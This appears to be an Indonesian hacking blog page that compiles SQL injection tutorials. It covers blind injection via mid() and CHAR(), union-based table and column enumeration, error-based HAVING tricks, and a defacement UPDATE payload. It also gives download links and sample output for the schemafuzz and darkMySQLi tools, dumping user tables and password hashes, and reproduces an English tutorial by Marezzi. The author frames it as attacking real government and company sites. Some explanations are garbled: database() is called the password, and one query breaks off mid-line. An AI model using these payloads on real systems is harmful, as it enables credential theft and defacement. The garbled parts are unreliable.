blind sqli Updated

Aku akan mencoba menjelaskan sesimple mungkin tentang blind sql injection yang aku anggap dulu rumit banget… Bukannya sok ngajarin atau apalah, disini aku hanya berusaha memberikan apa yang aku punya dan bisa…

Oke, semua bermula karena aku suntuk banget…Semua target .go.id, co.id atau apapun.id dah dibabat habis sama senior disini…Akhirnya tanpa sengaja aku nyangkut ke situs luar…Anggep aja situs tersebut bernama

http://iseng.com/news.php?id=76009

Nah pada target aku kali ini, aku menggunakan sql commands mid() yang hampir sama fungsinya dengan substring()…

Langsung aja aku ketik

http://iseng.com/news.php?id=76009 and 1=0
dan ternyata hasilnya adalah FALSE

http://iseng.com/news.php?id=76009 and 1=1
bernilai TRUE

Nah setelah aku yakin kalo web tersebut vulnerable maka aku melakukan injeksi (hehehehe…)

http://iseng.com/news.php?id=76009 and mid(user(),1,1)=CHAR(65)

Nah penjelasannya supaya lo semua pada ngerti (hehehehe…orang aku juga baru belajar, sok ngasih tau…) aku akan coba menjelaskan arti dan makna dari baris URL dan statement diatas…

~ mid(user()1,1) artinya dalam kasus ini aku tidak mengetahui value atau nilai dari user itu apa, maka dalam “()” aku sengaja kosongkan.

~ 1,1 adalah urutan dari value tersebut.

~ CHAR adalah peubah dalam desimal

~ 65 adalah value decimal tersebut dan 65 adalah “A” dalam ASCII so aku akan mengawalinya dengan 65

Nah kalo dah begini apa yang akan terjadi? Dalam tampilan web tersebut akan terjadi true atau false…Nah dalam kasus ini false, berarti aku harus memasukkan nilai yang lain agar menjadi true…

FALSE
http://iseng.com/news.php?id=76009 and mid(user(),1,1)=CHAR(65)

FALSE
http://iseng.com/news.php?id=76009 and mid(user(),1,1)=CHAR(66)

TRUE!!!
http://iseng.com/news.php?id=76009 and mid(user(),1,1)=CHAR(67)

Akhirnya mendapatkan nilai true dan nilai tersebut adalah 67 (C dalam ASCII)

Cari nilai kedua dan caranya adalah…

http://iseng.com/news.php?id=76009 and mid(user(),1,2)=CHAR(67,65)

Nah 1,1 nya dah diganti dengan 1,2…Jadi kalo dah dapet diganti aja jadi 1,3…1,4 dan seterusnya…

Nah akhirnya aku mendapat nilai true pada angka ke 82 (R dalam ASCII)

Lanjutin aja sampe dapet nilai atau value user dan sampai akhirnya menjadi

http://iseng.com/news.php?id=76009 and mid(user(),1,6)=CHAR(67,82,85,90,51,78)

67=C
82=R
85=U
90=Z
51=3
78=N

Ternyata username-nya adalah CRUZ3N (Wow…. Kebetulan yang sangat lucu ;p)

Nah untuk cari passwordnya aku tinggal mengganti value user() menjadi database() dan lakukan semua tahap diatas dari pertama sampe dapet value true…

Contoh:

http://iseng.com/news.php?id=76009 and mid mid(database(),1,5)=CHAR(75,69,82,69,78)

Jadi password yang didapat adalah…

75=K
69=E
82=R
69=E
78=N

Jadi username dan passwordnya adalah CRUZ3N dan KEREN…

Ternyata Blind SQL Injection gak nyebel-nyebelin amat (Tapi ngebetein…). Nah katanya neh…cara ini cukup efektif untuk web yang telah menfilter SQL Injection…Bener gak tuh? Gak tau dah… Ilmu aku belom nyampe situ…

Oke sampe disini aja yah…
Mohon maaf jika ada salah-salah kata dan berhubung aku lupa jadi kagak ada screenshootnya (Padahal kalo ada keren banget tuh ;p).

Semoga penjelasan yang sangat amat singkat dan gak ada apa-apanya ini dapat berguna…

Nih kode ASCII yang sapa tau berguna…

Char Code Description

9 Tab
10 Line feed
13 Carriage return
‘ ‘ 32 Space
! 33 Exclamation mark
” 34 Quotation mark
# 35 Number sign
$ 36 Dollar sign
% 37 Percent sign
& 38 Ampersand
‘ 39 Apostrophe
( 40 Left parenthesis
) 41 Right parenthesis
* 42 Asterisk
+ 43 Plus sign
, 44 Comma
– 45 Hyphen-minus
. 46 Full stop
/ 47 Solidus
0 48 Digit zero
1 49 Digit one
2 50 Digit two
3 51 Digit three
4 52 Digit four
5 53 Digit five
6 54 Digit six
7 55 Digit seven
8 56 Digit eight
9 57 Digit nine
: 58 Colon
; 59 Semicolon
62 Greater-than sign
? 63 Question mark
@ 64 Commercial at
A 65 Latin capital letter A
B 66 Latin capital letter B
C 67 Latin capital letter C
D 68 Latin capital letter D
E 69 Latin capital letter E
F 70 Latin capital letter F
G 71 Latin capital letter G
H 72 Latin capital letter H
I 73 Latin capital letter I
J 74 Latin capital letter J
K 75 Latin capital letter K
L 76 Latin capital letter L
M 77 Latin capital letter M
N 78 Latin capital letter N
O 79 Latin capital letter O
P 80 Latin capital letter P
Q 81 Latin capital letter Q
R 82 Latin capital letter R
S 83 Latin capital letter S
T 84 Latin capital letter T
U 85 Latin capital letter U
V 86 Latin capital letter V
W 87 Latin capital letter W
X 88 Latin capital letter X
Y 89 Latin capital letter Y
Z 90 Latin capital letter Z
[ 91 Left square bracket
92 Reverse solidus
] 93 Right square bracket
^ 94 Circumflex accent
_ 95 Low line
` 96 Grave accent
a 97 Latin small letter a
b 98 Latin small letter b
c 99 Latin small letter c
d 100 Latin small letter d
e 101 Latin small letter e
f 102 Latin small letter f
g 103 Latin small letter g
h 104 Latin small letter h
i 105 Latin small letter i
j 106 Latin small letter j
k 107 Latin small letter k
l 108 Latin small letter l
m 109 Latin small letter m
n 110 Latin small letter n
o 111 Latin small letter o
p 112 Latin small letter p
q 113 Latin small letter q
r 114 Latin small letter r
s 115 Latin small letter s
t 116 Latin small letter t
u 117 Latin small letter u
v 118 Latin small letter v
w 119 Latin small letter w
x 120 Latin small letter x
y 121 Latin small letter y
z 122 Latin small letter z
{ 123 left curly bracket
| 124 Vertical line
} 125 Right curly bracket
~ 126 Tilde
 127 (not used)
? 128 Euro sign Currency Symbols
? 129 (not used)
? 130 Single low-9 quotation mark General Punctuation
? 131 Latin small letter f with hook Latin Extended-B
? 132 Double low-9 quotation mark General Punctuation
? 133 Horizontal ellipsis General Punctuation
? 134 Dagger General Punctuation
? 135 Double dagger General Punctuation
? 136 Modifier letter circumflex accent Spacing Modifier Letters
? 137 Per mille sign General Punctuation
? 138 Latin capital letter S with caron Latin Extended-A
? 139 Single left-pointing angle quotation mark General Punctuation
? 140 Latin capital ligature OE Latin Extended-A
? 141 (not used)
? 142 Latin capital letter Z with caron Latin Extended-A
? 143 (not used)
? 144 (not used)
? 145 Left single quotation mark General Punctuation
? 146 Right single quotation mark General Punctuation
? 147 Left double quotation mark General Punctuation
? 148 Right double quotation mark General Punctuation
? 149 Bullet General Punctuation
? 150 En dash General Punctuation
? 151 Em dash General Punctuation
? 152 Small tilde Spacing Modifier Letters
? 153 Trade mark sign Letterlike Symbols
? 154 Latin small letter s with caron Latin Extended-A
? 155 Single right-pointing angle quotation mark General Punctuation
? 156 Latin small ligature oe Latin Extended-A
? 157 (not used)
? 158 Latin small letter z with caron Latin Extended-A
? 159 Latin capital letter Y with diaeresis Latin Extended-A
160 No-break space
? 161 Inverted exclamation mark
? 162 Cent sign
? 163 Pound sign
? 164 Currency sign
? 165 Yen sign
? 166 Broken bar
? 167 Section sign
? 168 Diaeresis
? 169 Copyright sign
? 170 Feminine ordinal indicator
? 171 Left-pointing double angle quotation mark
? 172 Not sign
? 173 Soft hyphen
? 174 Registered sign
? 175 Macron
? 176 Degree sign
? 177 Plus-minus sign
? 178 Superscript two
? 179 Superscript three
? 180 Acute accent
? 181 Micro sign
? 182 Pilcrow sign
? 183 Middle dot
? 184 Cedilla
? 185 Superscript one
? 186 Masculine ordinal indicator
? 187 Right-pointing double angle quotation mark
? 188 Vulgar fraction one quarter
? 189 Vulgar fraction one half
? 190 Vulgar fraction three quarters
? 191 Inverted question mark
? 192 Latin capital letter A with grave
? 193 Latin capital letter A with acute
? 194 Latin capital letter A with circumflex
? 195 Latin capital letter A with tilde
? 196 Latin capital letter A with diaeresis
? 197 Latin capital letter A with ring above
? 198 Latin capital letter AE
? 199 Latin capital letter C with cedilla
? 200 Latin capital letter E with grave
? 201 Latin capital letter E with acute
? 202 Latin capital letter E with circumflex
? 203 Latin capital letter E with diaeresis
? 204 Latin capital letter I with grave
? 205 Latin capital letter I with acute
? 206 Latin capital letter I with circumflex
? 207 Latin capital letter I with diaeresis
? 208 Latin capital letter Eth
? 209 Latin capital letter N with tilde
? 210 Latin capital letter O with grave
? 211 Latin capital letter O with acute
? 212 Latin capital letter O with circumflex
? 213 Latin capital letter O with tilde
? 214 Latin capital letter O with diaeresis
? 215 Multiplication sign
? 216 Latin capital letter O with stroke
? 217 Latin capital letter U with grave
? 218 Latin capital letter U with acute
? 219 Latin capital letter U with circumflex
? 220 Latin capital letter U with diaeresis
? 221 Latin capital letter Y with acute
? 222 Latin capital letter Thorn
? 223 Latin small letter sharp s
? 224 Latin small letter a with grave
? 225 Latin small letter a with acute
? 226 Latin small letter a with circumflex
? 227 Latin small letter a with tilde
? 228 Latin small letter a with diaeresis
? 229 Latin small letter a with ring above
? 230 Latin small letter ae
? 231 Latin small letter c with cedilla
? 232 Latin small letter e with grave
? 233 Latin small letter e with acute
? 234 Latin small letter e with circumflex
? 235 Latin small letter e with diaeresis
? 236 Latin small letter i with grave
? 237 Latin small letter i with acute
? 238 Latin small letter i with circumflex
? 239 Latin small letter i with diaeresis
? 240 Latin small letter eth
? 241 Latin small letter n with tilde
? 242 Latin small letter o with grave
? 243 Latin small letter o with acute
? 244 Latin small letter o with circumflex
? 245 Latin small letter o with tilde
? 246 Latin small letter o with diaeresis
? 247 Division sign
? 248 Latin small letter o with stroke
? 249 Latin small letter u with grave
? 250 Latin small letter u with acute
? 251 Latin small letter with circumflex
? 252 Latin small letter u with diaeresis
? 253 Latin small letter y with acute
? 254 Latin small letter thorn
? 255 Latin small letter y with diaeresis

SQLi secret

situs yang interaktif dengan pengunjung terdapat “database” didalamnya
ada “INFORMATION_SCHEMA” yang menangani table “INFORMATION_SCHEMA.TABLES” yang namanya “table_name”
dan yang manangani column “INFORMATION_SCHEMA.COLUMNS” yang namanya “column_name”

#cara inject ada 2 macam yaitu :

1. melalui form input
2. melalui url
yang kita bahas disini adalah cara inject melalui url saja!

#command yang sering di gunakan :

1. ORDER BY | untuk mengetahui jumlah column
2. UNION SELECT | untuk mengambil informasi dari table atau column
3. AND | untuk membandingkan 2 kondisi true atau false
4. OR | untuk menentukan 1 kondisi saja
5. — | untuk menutup perintah
6. + | untuk spasi
7. ‘ | karakter evil
8. HAVING | untuk menampilkan error
9. DATABASE() | untuk mengetahui nama database
10. USER() | untuk mengetahui nama user database
11. DATADIR() | untuk mengetahui posisi letak database
12. CONCAT | untuk menggabungkan 2 column atau lebih
13. GROUP_CONCAT | untuk menampilkan group dari gabungan column
14. CONCAT_WS | sama seperti concat
15. FROM | mengambil data dari
16. UPDATE | mengubah data yang telah ada
17. @@servername |

attack 1
========

1.cari tau apakah vulnerable

– http://www.site.com/news.asp?ArticleID=10+AND+1=0–
error
– http://www.site.com/news.asp?ArticleID=10+AND+1=1–
tidak error, berarti command bekerja situs = vulnerable, mode inject = on 🙂

2. cari tau jumlah column yang di tampilkan dalam suatu page

– http://www.site.com/news.asp?ArticleID=10+ORDER+BY+1–
normal
– http://www.site.com/news.asp?ArticleID=10+ORDER+BY+2–
normal, ulangi sampai error
– http://www.site.com/news.asp?ArticleID=10+ORDER+BY+4–
normal
– http://www.site.com/news.asp?ArticleID=10+ORDER+BY+5–
error, berarti jumlah column 4 karena error di nomor 5

3. menampilkan nama table

– http://www.site.com/news.asp?ArticleID=-1+UNION+SELECT+1,2,3,4+FROM+INFORMATION_SCHEMA.TABLES–

ganti nomor id ke negatif contoh nya “1” , akan tampil nomor rahasia di dalam page, nomor itu jadi kunci kita mencari nama table dan lain2
disini saya contohkan tampil nomor 3

– http://www.site.com/news.asp?ArticleID=-1+UNION+SELECT+1,2,table_name,4+FROM+INFORMATION_SCHEMA.TABLES–

hasil nya akan tampil satu nama table kita contoh kan “news”

4. mencari table yang di inginkan

– http://www.site.com/news.asp?ArticleID=-1+UNION+SELECT+1,2,table_name,4+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_name+news–

table yang tampil tadi adalah “news” kita tambah kan table news di ujung syntax untuk mencari nama table yang kita ingin kan, misal nya table “users”
ulangi langkah ini sampai kita dapatkan table “users”

5. menampilkan nama column

-www.site.com/news.asp?ArticleID=-1+UNION+SELECT+1,2,column_name,4+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=’users’–
akan tampil satu nama column misalnya “id” sedangkan kita mencari nama column seperti username,password, ulangin seperti langkah mencari table di atas
– http://www.site.com/news.asp?ArticleID=-1+UNION+SELECT+1,2,column_name,4+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=’Users’+AND+column_name+’id’–

6. menampilkan data

kita sudah tau nama table dan column nya, misalnya nama table “user” dan nama column “username”,”password”
sekarang saat nya kita melihat data yang ada dalam table dan column tersebut
– http://www.site.com/news.asp?ArticleID=-1+UNION+SELECT+1,2,username,4+FROM+Users–
hasil = jhon
– http://www.site.com/news.asp?ArticleID=-1+UNION+SELECT+1,2,password,4+FROM+Users–
hasil = santrina

kesimpulan,
kita dapatkan satu user dengan username = jhon dan password = santrina
==========================================================================

Attack 2
========

1. cari nama table dan nama column

– http://www.site.com/news.asp?ArticleID=10+HAVING+1=1–
kita dapatkan sebuah pesan error

“Column ‘news.id’ is invalid in the select list because it is not contained in
an aggregate function and there is no GROUP BY clause.”

dari situ kita tau ada table yang nama nya “news” dan ada column “id” didalamnya

2. cari column yang kita ingin kan

– http://www.site.com/news.asp?ArticleID=10+GROUP+BY+id+HAVING+1=1–
kita gunakan command group by untuk manampilkan nama colum berikut nya
kita liat pesan error
“Column ‘news.title’ is invalid in the select list because it is not contained in
an aggregate function and there is no GROUP BY clause.”

3. mengganti tittle situs

– http://www.site.com/news.asp?ArticleID=10+UPDATE+news+set+title=’Hacked by Crash’–
perintah diatas akan menyebabkan semua title article manjadi hacked by crash
– http://www.site.com/news.asp?ArticleID=10+UPDATE+news+set+title=’Hacked by Crash’+WHERE+id=10—
perintah ini kan mengganti title article nomor 10 aja!

update from “darkmysqli”

Setelah sukses dengan schemafuzz.py, rsauron sang pembuat scrypt menyatakan project schemafuzz.py resmi ditutup, di ganti dengan sebuah project yang sedang di kembangkan oleh nya yang diberi nama darkMySQLi
print “\n|——————————————————-|”
print “| rsauron@gmail.com v1.6 |”
print “| 1/2009 darkMySQLi.py |”
print “| — Multi Purpose MySQL Injection Tool — |”
print “| Usage: darkMySQLi.py [options] |”
print “| -h help darkc0de.com |”
print “|————————————————–|\n”

fungsi dari program ini tidak jauh beda dengan schemafuzz.py tapi mungkin lebih power full,..

scrypt nya bisa di ambil disini :
http://rapidshare.com/files/211594510/darkmysqli16.rar
http://www.darkc0de.com/others/darkmysqli16.zip
http://tinyurl.com/darkMySQLi

schemafuzz v5.0

Schemafuzz.py dibuat dengan menggunakan bahasa python oleh rsauron[@]gmail[dot]com dari situs darkc0de

tujuannya untuk memudahkan para SQL injector menemukan tabel dan kolom pada database sql yang dipenetrasi.

ok untuk tidak berpanjang lebar lagi mari kita perhatikan dengan seksama langkah-langkah berikut

pertama-tama kita cari target dengan google dan ditemukan:

misalnya

http://127.0.0.1/site/phpweb/forum.php?forum=1

sebelum kita melangkah lebih lanjut perlu kita ketahui apa saja perintah yang harus digunakan.

caranya seperti ini ./schemafuzz.py -h help

kita temukan sebagian perintahnya seperti ini
–schema, –dbs, –dump, –fuzz, –info, –full, –findcol langkah pertama

—————-

./schemafuzz.py -u “http://127.0.0.1/site/phpweb/forum.php?forum=1” –findcol

diperoleh seperti ini

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1–

[+] Evasion Used: “+” “–”

[+] 01:32:04

[+] Proxy Not Given

[+] Attempting To find the number of columns…

[+] Testing: 0,1,2,3,4,5,

[+] Column Length is: 6

[+] Found null column at column #: 1

[+] SQLi URL: http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,1,2,3,4,5–

[+] darkc0de URL: http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5

[-] Done!

langkah kedua

————–

setelah ketemu kita masukkan copy yang darkc0de URL jadi seperti ini

./schemafuzz.py -u “http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5” –fuzz

diperoleh seperti ini

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5–

[+] Evasion Used: “+” “–”

[+] 01:37:09

[+] Proxy Not Given

[+] Gathering MySQL Server Configuration…

Database: webthings

User: testing@localhost

Version: 5.0.51a

[+] Number of tables names to be fuzzed: 354

[+] Number of column names to be fuzzed: 263

[+] Searching for tables and columns…

[+] Found a table called: mysql.user

[+] Now searching for columns inside table “mysql.user”

[!] Found a column called:user

[!] Found a column called:password

[-] Done searching inside table “mysql.user” for columns!

[-] [01:37:48]

[-] Total URL Requests 618

[-] Done

langkah ketiga

—————

Setelah kita temukan nama databasenya trus kita lanjutkan kelangkah berikutnya

./schemafuzz.py -u “http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5” –schema -D namadatabasenya

./schemafuzz.py -u “http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5” –schema -D webthings

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5–

[+] Evasion Used: “+” “–”

[+] 01:43:11

[+] Proxy Not Given

[+] Gathering MySQL Server Configuration…

Database: webthings

User: testing@localhost

Version: 5.0.51a

[+] Showing Tables & Columns from database “webthings”

[+] Number of Tables: 33

[Database]: webthings

[Table: Columns]

[0]wt_articles: cod,article_id,subtitle,page,text,text_ori,htmlarticle,views

[1]wt_articles_title: article_id,category,title,active,date,userid,views

[2]wt_articlescat: cod,category

[3]wt_banners: cod,name,active,image,url_image,url,code,views,clicks,periode,start_date,end_date

[4]wt_banners_log: banner,date,views,clicks,sessions

[5]wt_banners_rawlog: banner,type,date,session

[6]wt_centerboxes: cod,pos,active,oneverypage,menuoption,title,content,file,type,draw_box

[7]wt_comments: cod,type,link,date,userid,comment

[8]wt_config: id,config

[9]wt_downloads: id,category,name,active,url,date,size,count,rate_sum,rate_count,short_description,description,small_picture,big_picture,author_name,author_email,comments,url_screenshot,license,license_text

[10]wt_downloadscat: cod,ref,name,descr

[11]wt_faq: cod,topic,uid,active,question_ori,question,answer_ori,answer

[12]wt_faq_topics: cod,name

[13]wt_forum_log_topics: uid,msgid,logtime,notifysent

[14]wt_forum_msgs: cod,forum,msg_ref,date,userid,title,text_ori,date_der,views,closed,sticky,modifiedtime,modifiedname,notifies

[15]wt_forums: cod,title,descr,locked,notifies,register

[16]wt_forums_mod: forum,userid,type

[17]wt_guestbook: id,datum,naam,email,homepage,plaats,tekst

[18]wt_links: id,category,active,name,url,count,descr,obs

[19]wt_linkscat: cod,name,descr,parent_id

[20]wt_menu: id,pos,title,url,type,newwindow,lang

[21]wt_news: cod,lang,category,catimgpos,date,title,userid,image,align,active,counter,text,text_ori,full_text,full_text_ori,archived,sidebox,sideboxtitle,sideboxpos

[22]wt_newscat: cod,name,image

[23]wt_online: id,time,uid

[24]wt_picofday: id,category,userid,small_picture,big_picture,description,full_description,views,clicks

[25]wt_picofdaycat: id,name,description

[26]wt_picofdaysel: date,picture_id,views,clicks

[27]wt_polls: cod,dtstart,dtend,question,item01,item02,item03,item04,item05,item06,item07,item08,item09,item10,count01,count02,count03,count04,count05,count06,count07,count08,count09,count10

[28]wt_sideboxes: cod,pos,side,active,title,content,file,type,function,modules

[29]wt_user_access: userid,module

[30]wt_user_book: userid,cod_user

[31]wt_user_msgs: cod,userid,folder,date,user_from,title,msg_read,text,notify

[32]wt_users: uid,name,password,class,realname,email,question1,question2,url,receivenews,receiverel,country,city,state,icq,aim,sex,session,active,comments,

newsposted,commentsposted,faqposted,topicsposted,dateregistered,dateactivated,lastvisit,logins,newemail,newemailsess,avatar,lang,theme,signature,banned,msn,showemail

[-] [01:43:48]

[-] Total URL Requests 270

[-] Done

untuk mengetahui apakah kita bisa load_file dalam site tersebut gunakan perintah ini

./schemafuzz.py -u “http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5” –info

maka akan tampil seperti ini

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5–

[+] Evasion Used: “+” “–”

[+] 01:46:51

[+] Proxy Not Given

[+] Gathering MySQL Server Configuration…

Database: webthings

User: testing@localhost

Version: 5.0.51a

[+] Do we have Access to MySQL Database: Yes <– w00t w00t

[!] http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,concat(user,0x3a,password),2,3,4,5+FROM+mysql.user–

[+] Do we have Access to Load_File: No

[-] [01:46:51]

[-] Total URL Requests 3

[-] Done

ternyata kita gak bisa load_file tapi bisa mengakses ke database mysqlnya hehehe

untuk mengetahui beberapa database yang terdapat pada site tersebut, kita gunakan perintah seperti ini

./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5&quot; –dbs

akan tampil seperti ini

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5&#8211;

[+] Evasion Used: "+" "–"

[+] 01:58:15

[+] Proxy Not Given

[+] Gathering MySQL Server Configuration…

Database: webthings

User: testing@localhost

Version: 5.0.51a

[+] Showing all databases current user has access too!

[+] Number of Databases: 1

[0]webthings

[-] [01:58:17]

[-] Total URL Requests 30

[-] Done

langkah selanjutnya

——————–

cara untuk menemukan user dan password

kita gunakan perintah –dump -D namadatabase -T namatabel -C namakolom

setelah kita menemukan nama database, nama tabel dan kolom tinggal kita masukkan perintah seperti ini

./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5&quot; –dump -D webthing -T wt_users -C name,password

eing ing eng….

jreennnng….keluar deh user ama passwordnya

hasilnya dibawah ini

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5&#8211;

[+] Evasion Used: "+" "–"

[+] 02:08:47

[+] Proxy Not Given

[+] Gathering MySQL Server Configuration…

Database: webthings

User: testing@localhost

Version: 5.0.51a

[+] Dumping data from database "webthings" Table "wt_users"

[+] Column(s) ['name', 'password']

[+] Number of Rows: 2

[0] admin:e00b29d5b34c3f78df09d45921c9ec47:

[1] user:098f6bcd4621d373cade4e832627b4f6:

[-] [02:08:48]

[-] Total URL Requests 4

[-] Done

jangan lupa kita selalu mengecek schemafuzzlog.txt nya

setelah itu tinggal kita meng crack passwordnya pake program

gemana rekan2 gampang kan pake schemafuzz.

Blind SQLi

SQL Injection Tutorial by Marezzi (MySQL)

In this tutorial i will describe how sql injection works and how to
use it to get some useful information.

First of all: What is SQL injection?

It’s one of the most common vulnerability in web applications today.
It allows attacker to execute database query in url and gain access
to some confidential information etc…(in shortly).

1.SQL Injection (classic or error based or whatever you call it) 😀

2.Blind SQL Injection (the harder part)

So let’s start with some action 😀

1). Check for vulnerability

Let’s say that we have some site like this

http://www.site.com/news.php?id=5

Now to test if is vulrnable we add to the end of url ‘ (quote),

and that would be http://www.site.com/news.php?id=5&#8217;

so if we get some error like
“You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc…”
or something similar

that means is vulrnable to sql injection 🙂

2). Find the number of columns

To find number of columns we use statement ORDER BY (tells database how to order the result)

so how to use it? Well just incrementing the number until we get an error.

http://www.site.com/news.php?id=5 order by 1/* <– no error

http://www.site.com/news.php?id=5 order by 2/* <– no error

http://www.site.com/news.php?id=5 order by 3/* <– no error

http://www.site.com/news.php?id=5 order by 4/* <– error (we get message like this Unknown column '4' in 'order clause' or something like that)

that means that the it has 3 columns, cause we got an error on 4.

3). Check for UNION function

With union we can select more data in one sql statement.

so we have

http://www.site.com/news.php?id=5 union all select 1,2,3/* (we already found that number of columns are 3 in section 2). )

if we see some numbers on screen, i.e 1 or 2 or 3 then the UNION works 🙂

4). Check for MySQL version

http://www.site.com/news.php?id=5 union all select 1,2,3/* NOTE: if /* not working or you get some error, then try —
it's a comment and it's important for our query to work properly.

let say that we have number 2 on the screen, now to check for version
we replace the number 2 with @@version or version() and get someting like 4.1.33-log or 5.0.45 or similar.

it should look like this http://www.site.com/news.php?id=5 union all select 1,@@version,3/*

if you get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE) …"

i didn't see any paper covering this problem, so i must write it 🙂

what we need is convert() function

i.e.

http://www.site.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/*

or with hex() and unhex()

i.e.

http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/*

and you will get MySQL version 😀

5). Getting table and column name

well if the MySQL version is < 5 (i.e 4.1.33, 4.1.12…) 5 version.

we must guess table and column name in most cases.

common table names are: user/s, admin/s, member/s …

common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc…

i.e would be

http://www.site.com/news.php?id=5 union all select 1,2,3 from admin/* (we see number 2 on the screen like before, and that’s good :D)

we know that table admin exists…

now to check column names.

http://www.site.com/news.php?id=5 union all select 1,username,3 from admin/* (if you get an error, then try the other column name)

we get username displayed on screen, example would be admin, or superadmin etc…

now to check if column password exists

http://www.site.com/news.php?id=5 union all select 1,password,3 from admin/* (if you get an error, then try the other column name)

we seen password on the screen in hash or plain-text, it depends of how the database is set up 🙂

i.e md5 hash, mysql hash, sha1…

now we must complete query to look nice 🙂

for that we can use concat() function (it joins strings)

i.e

http://www.site.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*

Note that i put 0x3a, its hex value for : (so 0x3a is hex value for colon)

(there is another way for that, char(58), ascii value for : )

http://www.site.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*

now we get dislayed username:password on screen, i.e admin:admin or admin:somehash

when you have this, you can login like admin or some superuser 😀

if can’t guess the right table name, you can always try mysql.user (default)

it has user i password columns, so example would be

http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,password),3 from mysql.user/*

6). MySQL 5

Like i said before i’m gonna explain how to get table and column names
in MySQL > 5.

For this we need information_schema. It holds all tables and columns in database.

to get tables we use table_name and information_schema.tables.

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables/*

here we replace the our number 2 with table_name to get the first table from information_schema.tables

displayed on the screen. Now we must add LIMIT to the end of query to list out all tables.

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*

note that i put 0,1 (get 1 result starting from the 0th)

now to view the second table, we change limit 0,1 to limit 1,1

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/*

the second table is displayed.

for third table we put limit 2,1

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/*

keep incrementing until you get some useful like db_admin, poll_user, auth, auth_user etc… 😀

To get the column names the method is the same.

here we use column_name and information_schema.columns

the method is same as above so example would be

http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/*

the first column is diplayed.

the second one (we change limit 0,1 to limit 1,1)

ie.

http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 1,1/*

the second column is displayed, so keep incrementing until you get something like

username,user,login, password, pass, passwd etc… 😀

if you wanna display column names for specific table use this query. (where clause)

let’s say that we found table users.

i.e

http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name=’users’/*

now we get displayed column name in table users. Just using LIMIT we can list all columns in table users.

Note that this won’t work if the magic quotes is ON.

let’s say that we found colums user, pass and email.

now to complete query to put them all together 😀

for that we use concat() , i decribe it earlier.

i.e

http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/*

what we get here is user:pass:email from table users.

example: admin:hash:whatever@blabla.com

That’s all in this part, now we can proceed on harder part 🙂

2. Blind SQL Injection

Blind injection is a little more complicated the classic injection but it can be done 😀

I must mention, there is very good blind sql injection tutorial by xprog, so it’s not bad to read it 😀

Let’s start with advanced stuff.

I will be using our example

http://www.site.com/news.php?id=5

when we execute this, we see some page and articles on that page, pictures etc…

then when we want to test it for blind sql injection attack

http://www.site.com/news.php?id=5 and 1=1 <— this is always true

and the page loads normally, that's ok.

now the real test

http://www.site.com/news.php?id=5 and 1=2 80

ok this here pulls the first character from first user in table users.

substring here returns first character and 1 character in length. ascii() converts that 1 character into ascii value

and then compare it with simbol greater then > .

so if the ascii char greater then 80, the page loads normally. (TRUE)

we keep trying until we get false.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95

we get TRUE, keep incrementing

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98

TRUE again, higher

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99

FALSE!!!

so the first character in username is char(99). Using the ascii converter we know that char(99) is letter ‘c’.

then let’s check the second character.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99

Note that i’m changed ,1,1 to ,2,1 to get the second character. (now it returns the second character, 1 character in lenght)

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99

TRUE, the page loads normally, higher.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>107
